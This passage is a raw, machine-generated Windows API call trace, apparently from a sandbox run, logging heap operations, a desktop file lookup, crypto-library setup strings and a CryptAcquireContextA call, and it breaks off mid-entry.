[0213.911] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0213.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c38 [0213.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0213.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53c38 | out: hHeap=0x970000) returned 1 [0213.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0213.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c38 [0213.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0213.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0213.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540a8 [0213.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0213.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b38 [0213.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0213.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0213.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0213.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0213.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0213.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0213.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53c38 | out: hHeap=0x970000) returned 1 [0213.912] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0213.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c38 [0213.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0213.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53c38 | out: hHeap=0x970000) returned 1 [0213.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543f0 [0213.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c38 [0213.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0213.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0213.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54490 [0213.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0213.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0213.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0213.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54170 [0213.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0213.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0213.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0213.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53c38 | out: hHeap=0x970000) returned 1 [0213.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c38 [0213.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0213.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0213.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0213.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0213.913] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/yW8EXq3.png", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x450721d0, ftCreationTime.dwHighDateTime=0x1d5e721, ftLastAccessTime.dwLowDateTime=0x4c7382b0, ftLastAccessTime.dwHighDateTime=0x1d5ea41, ftLastWriteTime.dwLowDateTime=0x4c7382b0, ftLastWriteTime.dwHighDateTime=0x1d5ea41, nFileSizeHigh=0x0, nFileSizeLow=0xb494, dwReserved0=0x0, dwReserved1=0x8cf1b8, cFileName="yW8EXq3.png", cAlternateFileName="")) returned 0xa87490 [0213.913] FindClose (in: hFindFile=0xa87490 | out: hFindFile=0xa87490) returned 1 [0213.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0213.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0213.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53c38 | out: hHeap=0x970000) returned 1 [0213.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0213.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0213.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0213.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0213.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543f0 | out: hHeap=0x970000) returned 1 [0213.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0213.914] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0213.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0213.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0213.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0213.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0213.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0213.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54238 [0213.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0213.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0213.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0213.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0213.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0213.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0213.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0213.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0213.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0213.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0213.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0213.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0213.914] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0213.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54260 [0213.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0213.914] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0213.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54260 | out: hHeap=0x970000) returned 1 [0213.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0213.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50458 [0213.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0213.914] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0213.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0213.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fb90 [0213.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0213.915] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0213.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fb90 | out: hHeap=0x970000) returned 1 [0213.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0213.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e505f0 [0213.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0213.915] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0213.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0213.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0213.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0213.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0213.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0213.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0213.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0213.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0213.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0213.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0213.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0213.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0213.915] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0213.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0213.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0213.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0213.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54530 [0213.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0213.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0213.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0213.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544b8 [0213.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0213.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0213.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0213.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54300 [0213.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0213.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0213.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0213.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0213.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0213.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0213.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0213.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0213.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0213.916] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x756e0000 [0213.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0213.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0213.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0213.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0213.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0213.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0213.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0213.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54530 | out: hHeap=0x970000) returned 1 [0213.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0213.917] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0213.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0213.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0213.917] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0213.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e801e8 [0213.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0213.917] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0213.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e801e8 | out: hHeap=0x970000) returned 1 [0213.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0213.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0213.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b58 [0213.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0213.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0213.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0213.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0213.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e503f8 [0213.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0213.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0213.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b68 [0213.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0213.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544e0 [0213.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0213.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0213.917] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0213.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0213.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0213.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0213.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0213.918] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0213.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0213.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0213.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544e0 | out: hHeap=0x970000) returned 1 [0213.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0213.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0213.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0213.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0213.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0213.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0213.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0213.918] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0213.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0213.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0213.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0213.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0213.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b68 [0213.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544e0 [0213.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0213.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0213.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0213.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0213.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0213.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0213.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0213.919] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0213.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0213.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0213.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0213.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54508 [0213.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0213.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0213.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0213.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54328 [0213.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0213.919] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0213.919] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0213.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0213.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0213.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0213.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0213.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0213.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0213.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0213.920] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0213.920] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0213.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fff0 | out: hHeap=0x970000) returned 1 [0213.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0213.920] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0213.920] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0213.920] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0213.920] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2e69b28, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0213.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0213.921] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0213.921] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2e69988, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0213.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0213.921] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa5f958) returned 1 [0213.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0213.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699e8 [0213.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0213.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0213.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0213.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0213.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0213.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0213.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0213.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0213.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0213.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0213.923] RtlAllocateHeap 